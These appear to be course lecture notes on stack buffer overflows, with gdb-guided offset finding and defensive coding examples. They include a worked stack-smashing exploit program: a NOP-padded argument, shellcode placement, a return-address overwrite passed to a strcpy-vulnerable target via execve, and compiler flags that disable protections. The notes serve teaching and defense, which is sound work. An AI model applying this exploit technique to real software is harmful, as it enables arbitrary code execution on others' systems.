CSE 374, Lecture 20: Buffer Overflows

The classic guide to "stack smashing" (buffer overflows) is very old now, so some of its examples won't work exactly as written, but it's still a great reference.

What is a buffer overflow?

    void echo() {
      char buf[8];
      gets(buf);
      puts(buf);
    }

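gets does not do any bounds checking: it keeps writing until it reaches a newline or the end of input. Since buf holds 8 bytes (7 characters plus the terminating null byte), any input line longer than 7 characters will write past the end of buf.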
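
A bounded version of echo might look like the sketch below. It swaps gets for fgets, which is told the buffer size and never writes more than that many bytes. The names read_line_bounded and echo_safe are made up for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: reads at most size-1 characters of one line from
 * `in` into buf, always null-terminates, and strips a trailing newline.
 * Returns 0 on success, -1 on end of input or error. */
int read_line_bounded(FILE *in, char *buf, size_t size) {
  if (size == 0 || fgets(buf, (int)size, in) == NULL) {
    return -1;
  }
  buf[strcspn(buf, "\n")] = '\0';  /* cut at the newline, if there is one */
  return 0;
}

/* Same idea as echo(), but input can no longer run past the end of buf. */
void echo_safe(void) {
  char buf[8];
  if (read_line_bounded(stdin, buf, sizeof buf) == 0) {
    puts(buf);
  }
}
```

Calling echo_safe() with the input line "hello world" prints "hello w": the first 7 characters fit, and the rest of the line stays unread in stdin.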

Stack layout

As a refresher, remember the layout of a "frame" of the stack (from the gdb lecture):

     --------------------
    |                    |
    |       local        |
    |     variables      |
    |                    |
    |--------------------|
    | prev frame pointer |
    |--------------------|
    |   return address   |
    |--------------------|
    |                    |
    | function arguments |
    |                    |
     --------------------

A "stack frame" is a section of the stack that is set aside for each function call. It is pushed onto the stack when the function is called and popped off when the function returns.

This picture of the stack shows us an interesting situation: a buffer is filled from lower to higher addresses (downward in this picture), so if a write to a local variable runs past its allocated space, it can overwrite the stack frame's "previous frame pointer" and "return address"!
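
To see this layout on a real machine, a function can report where its own local buffer, frame, and return address live. This is only a sketch: it assumes GCC or Clang, since __builtin_frame_address and __builtin_return_address are compiler extensions, and the names frame_info, inspect_frame, and print_frame are invented for this example. The exact distances depend on the compiler, flags, and platform.

```c
#include <stdint.h>
#include <stdio.h>

struct frame_info {
  uintptr_t buf_addr;    /* address of a local buffer */
  uintptr_t frame_addr;  /* frame address of inspect_frame */
  uintptr_t ret_addr;    /* code address inspect_frame returns to */
};

/* Collects addresses describing this function's own stack frame. */
struct frame_info inspect_frame(void) {
  char buf[8] = {0};
  struct frame_info info;
  info.buf_addr = (uintptr_t)buf;
  info.frame_addr = (uintptr_t)__builtin_frame_address(0);
  info.ret_addr = (uintptr_t)__builtin_return_address(0);
  return info;
}

/* Prints the collected addresses in hex. */
void print_frame(void) {
  struct frame_info info = inspect_frame();
  printf("local buffer at:   %#lx\n", (unsigned long)info.buf_addr);
  printf("frame address:     %#lx\n", (unsigned long)info.frame_addr);
  printf("returns to code at %#lx\n", (unsigned long)info.ret_addr);
}
```

On a typical unoptimized x86-64 Linux build, the buffer address usually comes out slightly lower than the frame address, which matches the picture above.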

First exploit

To demonstrate how we could exploit buffer overflows, we'll use the following toy program:

    #include <stdint.h>  // uintptr_t
    #include <stdio.h>   // printf

    void function(int a, int b, int c) {
      char buffer1[5];
      uintptr_t ret;

      ret = (uintptr_t)buffer1 + 0; // fill this in
      *((uintptr_t*)ret) += 0; // fill this in
    }

    int main(int argc, char** argv) {
      int x;

      x = 0;
      function(1,2,3);
      x = 1;  // skip this line
      printf("%d\n",x);

      return 0;
    }

We want to skip the line "x = 1;" in the main function by modifying function's return address. This takes two steps:

- Identify where the return address is stored relative to the local variable buffer1.
- Figure out how many bytes the compiled instruction for "x = 1;" takes up, so that we can increment the return address by that many bytes.

We will figure out these two steps using gdb - these commands are helpful:

    break function    // break at the start of function
    x buffer1         // prints the location of buffer1
    info frame        // under "Saved registers", "rip at <address>" is the location of the return address
    print <rip-location> - <buffer1-location>
                      // prints the number of bytes between buffer1 and rip

         --- now we have the first value to fill in (24 on my computer) ---

    disassemble main  // shows the machine code and how many bytes each instruction takes up.
                      // We identify the line that calls function, then see that the next
                      // instruction moves 1 into x. That instruction takes 7 bytes, so we
                      // have now found the second number!

This is a toy example, of course, not like the real world! The actual objective of a buffer overflow like this is usually to start a shell (e.g. bash) from the vulnerable C program. We can do this by storing the compiled machine code that runs a shell as a string (Google for "buffer overflow shellcode") and then overwriting the return address so that it points into the string we control.

Second exploit

Consider this victim program with a buffer overflow weakness because of an unbounded strcpy:

    int bar(char *arg, char *out) {
      strcpy(out, arg);
      return 0;
    }

    void foo(char *argv[]) {
      char buf[256];
      bar(argv[1], buf);
    }

    int main(int argc, char *argv[]) {
      if (argc != 2) {
        fprintf(stderr, "target1: argc != 2\n");
        exit(1);
      }
      foo(argv);
      return 0;
    }

What do we need to do to exploit this program and get it to run a shell? We can use gdb as before to find these things.

- We need to pass in the attack code plus a value to overwrite the return address as the argument to main.
- We need to know the size of the buffer and the offset between the start of the buffer and foo's return address.
- We need to know the address of the attack code (which will now be stored in "buf") so that we can overwrite the return address with that address.

In order to accomplish this, we'll write another program that calls the victim program and passes it the right argument. This makes it easier to generate the proper string to give as argument.

    int main(void) {
      char *args[3];
      char *env[1];  // don't worry about env variables, we'll set them to null

      args[0] = "/tmp/target";
      args[2] = NULL;
      env[0] = NULL;

      // We used gdb to determine that there are 264 bytes between
      // buf and the return address, so we malloc space for 264
      // bytes of padding, plus the new return address, plus one
      // byte for the null terminator.
      size_t len = 264 + sizeof(uintptr_t);
      args[1] = (char*) malloc(len + 1);

      // We set the memory to a value so that we ensure that there
      // is no null-termination in the first 264 bytes of the
      // string. 0x90 is also the byte for the x86 "no-op"
      // instruction.
      memset(args[1], 0x90, len);

      // Null-terminate the string.
      args[1][len] = '\0';

      // Add in the attack code to the front of the argument.
      memcpy(args[1], shellcode, strlen(shellcode));

      // Store the address of buf at the appropriate location
      // in the string (we determined the address using gdb).
      // The high bytes of this address are zero, so strcpy in
      // the victim stops copying partway through it.
      *(uintptr_t*)(args[1] + 264) = 0x7fffffffdb90;

      // Actually call the victim program.
      execve("/tmp/target", args, env);
    }

Note that because compilers and operating systems have added many defenses over the last 20 years, the original buffer overflow attacks like this one won't work by default; we need to disable the defenses listed below to demonstrate it. Include "-fno-stack-protector -z execstack" when compiling both the target program and the exploit to disable the protections.

Defenses against buffer overflows

Avoid vulnerabilities in the first place.
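- Use library functions that limit string lengths
  - fgets instead of gets
  - strncpy instead of strcpy (strncpy does not null-terminate the destination when the source is too long, so add the terminator yourself)
  - %ns, where n is a maximum field width (such as %7s for an 8-byte buffer), instead of %s in scanf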
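
The bounded alternatives above could be used roughly as in the sketch below. The helper names copy_bounded and read_word are hypothetical, and the 8-byte buffer size is chosen only to match the echo example.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: copies src into dst (capacity dst_size bytes) and
 * always null-terminates. Returns 0 if src fit, -1 if it was truncated. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
  if (dst_size == 0) {
    return -1;
  }
  strncpy(dst, src, dst_size - 1);  /* never writes past dst_size - 1 bytes */
  dst[dst_size - 1] = '\0';         /* strncpy alone may leave this out */
  return strlen(src) < dst_size ? 0 : -1;
}

/* Hypothetical helper: reads one whitespace-delimited word of at most
 * 7 characters into an 8-byte buffer. Returns 0 on success, -1 otherwise. */
int read_word(FILE *in, char out[8]) {
  return fscanf(in, "%7s", out) == 1 ? 0 : -1;
}
```

With an 8-byte destination, copy_bounded stores "0123456" for the source "0123456789" and returns -1 to report the truncation, instead of writing past the buffer.
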
System-level protections
- Make stack non-executable
- Have compiler insert "stack canaries"
  - Put a special value between buffer and return address
  - Check for corruption before leaving function
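
The canary idea can be imitated by hand to see why it works. The sketch below is only a model, not what the compiler actually emits: a struct stands in for the stack frame, saved_value stands in for the return address, and CANARY_VALUE is a made-up constant (real canaries are typically random values chosen when the program starts). The names guarded_frame and copy_and_check are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CANARY_VALUE 0xDEADC0DEu  /* placeholder; real canaries are random */

/* Model of a frame: buffer first, then the canary, then the value to protect. */
struct guarded_frame {
  char buf[8];
  uint32_t canary;
  uint32_t saved_value;  /* stands in for the return address */
};

/* Copies len bytes of input to the start of the frame, the way an unchecked
 * copy into buf would. The length is clamped to the struct size so that the
 * demo itself never writes out of bounds.
 * Returns 1 if the canary is intact, 0 if the copy corrupted it. */
int copy_and_check(struct guarded_frame *f, const void *input, size_t len) {
  f->canary = CANARY_VALUE;
  if (len > sizeof *f) {
    len = sizeof *f;
  }
  memcpy(f, input, len);  /* buf is the first member, so it sits at offset 0 */
  return f->canary == CANARY_VALUE;
}
```

Copying 8 bytes or fewer leaves the canary untouched, so copy_and_check returns 1. Copying 16 bytes of 'A' overwrites the canary on the way to saved_value, so the check returns 0, and a real program would abort at that point instead of returning.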